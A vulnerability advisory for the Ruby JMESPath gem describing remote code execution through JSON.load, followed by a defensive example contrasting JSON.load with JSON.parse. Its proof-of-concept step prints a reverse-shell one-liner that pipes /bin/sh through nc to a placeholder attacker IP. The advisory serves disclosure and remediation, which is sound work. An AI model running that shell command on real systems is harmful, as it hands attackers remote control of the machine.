Description

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the use of JSON.load, which is unsafe when applied to untrusted input.

Proof-of-concept

1. To reproduce, first install JMESPath 1.6.0 or earlier:

2. Start the Interactive Ruby Shell (irb) with the following command so the library can be loaded:

irb

3. If irb is not installed, install it with the following command:

gem install irb

4. Pick the desired payload; I have picked one from pentestmonkey:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, import the vulnerable JMESPath library and supply the payload to execute the reverse shell:

Conclusion

It is recommended to use JSON.parse instead of JSON.load. In this case, we observed that JSON.load does not validate the input data, which leads to Remote Code Execution.
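The following is an added example, not code from the advisory or from the JMESPath project. It contrasts the two calls on the same constructed document, using Range from json/add/range as a harmless stand-in class: JSON.load instantiates whatever class the input names, while JSON.parse returns plain data. The helper names unsafe_load, safe_parse and contains_json_class? are assumed for illustration.

```ruby
require 'json'
require 'json/add/range' # registers Range.json_create; a benign class used only to show the mechanism

# Constructed sample input: a JSON document carrying a "json_class" key, the
# hook that JSON.load (with create_additions) uses to instantiate objects.
UNTRUSTED_INPUT = '{"json_class":"Range","a":[1,5,false]}'

# The vulnerable code path: JSON.load turns the document into a live Ruby
# object whose class is chosen by whoever wrote the input.
def unsafe_load(input)
  JSON.load(input, nil, create_additions: true)
end

# Hardened replacement: JSON.parse never honours json_class, so the result is
# plain data (Hash/Array/String/Numeric/true/false/nil), and nesting is bounded.
def safe_parse(input)
  JSON.parse(input, create_additions: false, max_nesting: 32)
end

# Defensive check for logging or alerting: flag documents that carry the hook
# at any depth, since legitimate input for this library should never contain it.
def contains_json_class?(value)
  case value
  when Hash  then value.key?("json_class") || value.values.any? { |v| contains_json_class?(v) }
  when Array then value.any? { |v| contains_json_class?(v) }
  else false
  end
end

if __FILE__ == $0
  p unsafe_load(UNTRUSTED_INPUT)                      # 1..5  (a Range object built from the input)
  p safe_parse(UNTRUSTED_INPUT)                       # {"json_class"=>"Range", "a"=>[1, 5, false]}
  p contains_json_class?(safe_parse(UNTRUSTED_INPUT)) # true
end
```

Parsing with safe_parse and then rejecting or logging any document for which contains_json_class? is true gives both the fix and a detection signal for attempts against the old code path.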